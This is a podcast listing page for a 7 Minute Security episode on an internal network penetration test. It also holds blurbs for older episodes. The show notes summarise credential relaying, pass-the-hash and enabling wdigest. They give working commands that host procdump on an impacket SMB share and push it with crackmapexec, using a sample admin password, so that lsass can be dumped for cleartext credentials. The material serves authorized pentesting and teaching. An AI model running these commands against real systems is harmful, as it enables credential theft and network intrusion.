7MS #383: Tales of Internal Network Pentest Pwnage - Part 10
7 Minute Security1 Loka 2019

7MS #383: Tales of Internal Network Pentest Pwnage - Part 10

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

This episode is a "sequel" of sorts to part 9 where I was helping another company tag-team an internal network pentest. (In announcer voice) "When we last left our heroes we had..."

  • Relayed one high-priv cred from one box to another
  • Dumped and cracked a local machine's hash
  • Passed that hash around the network
  • Found (via Bloodhound) some high value targets we wanted to grab domain admin creds from
  • Set the wdigest flag via CrackMapExec

Today, we talk about how we came back to the pentest a few days later and scripted the procdump/lsass operation to (hopefully) grab cleartext credentials from these high value targets. Here's how we did it:

mkdir /share wget https://live.sysinternals.com/procdump64.exe screen -R smb /opt/impacket/examples/smbserver.py -smb2support share /share

Then, we ran the following CME commands to copy procdump over to the victim machine, create the dump, take the dump, then delete procdump.exe:

crackmapexec smb 192.168.55.220 -u Administrator -p 'Winter2018!' --local-auth --exec-method smbexec -x 'copy "\\192.168.55.60\share\procdump64.exe" "c:\users\public\procdump64.exe"' (more on today's episode show notes)

Jaksot(688)

7MS #255: PwnPro 101

7MS #255: PwnPro 101

I'm kicking the tires on the PwnPro which is an all-in-one wired, wireless and Bluetooth assessment and pentesting tool. Upon getting plugged into a network, it peers with a cloud portal and lets you assess and pentest from the comfort of your jammies back at your house! Oh, and did I mention it runs Kali on the back end? Delicious. Today's episode dives into some of what I've been learning about the PwnPro as I run it through its paces at work and warm it up for our first customer assessment...

27 Huhti 201710min

7MS #254: Bash Bunny

7MS #254: Bash Bunny

I've been working with the Bash Bunny for the past few weeks in preparation for a presentation/demo I'm doing in a few weeks. Today I want to talk about what the Bunny is, the cool things it can do, and some of my favorite payloads. Also, I started thinking about what conversation topics spawn from a demo of the Bunny. Specifically, I want to know how people would defend against the Bunny using AD policies, peripheral controls, etc. Check out the Hak5 thread I started about this, as it has got some great ideas.

20 Huhti 201710min

7MS #253: Desperately Seeking Service Accounts

7MS #253: Desperately Seeking Service Accounts

Find the show notes here!

13 Huhti 20179min

7MS #252: LAPS - Local Administrator Password Solution

7MS #252: LAPS - Local Administrator Password Solution

Show notes are here.

6 Huhti 20178min

7MS #251: Blackholing Malvertising with Pi-Hole

7MS #251: Blackholing Malvertising with Pi-Hole

Show notes are here

30 Maalis 201710min

7MS #250: The PBS Telethon Episode!

7MS #250: The PBS Telethon Episode!

Show notes for today's episode can be found here!

23 Maalis 201710min

7MS #249: AlienVault Certified Security Engineer - Part 1

7MS #249: AlienVault Certified Security Engineer - Part 1

Show notes are here.

16 Maalis 20179min

7MS #248: How to Hack the 10 O'clock News

7MS #248: How to Hack the 10 O'clock News

Show notes are here.

9 Maalis 201711min

Suosittua kategoriassa Politiikka ja uutiset

ootsa-kuullut-tasta-2
rss-podme-livebox
aikalisa
politiikan-puskaradio
otetaan-yhdet
rss-vaalirankkurit-podcast
aihe
et-sa-noin-voi-sanoo-esittaa
rss-sinivalkoinen-islam
rikosmyytit
the-ulkopolitist
rss-merja-mahkan-rahat
rss-raha-talous-ja-politiikka
rss-tasta-on-kyse-ivan-puopolo-verkkouutiset
politbyroo
linda-maria
rss-kaikki-uusiksi
rss-agility-unite-podcast
rss-mina-ukkola
rss-voima-aanisisallot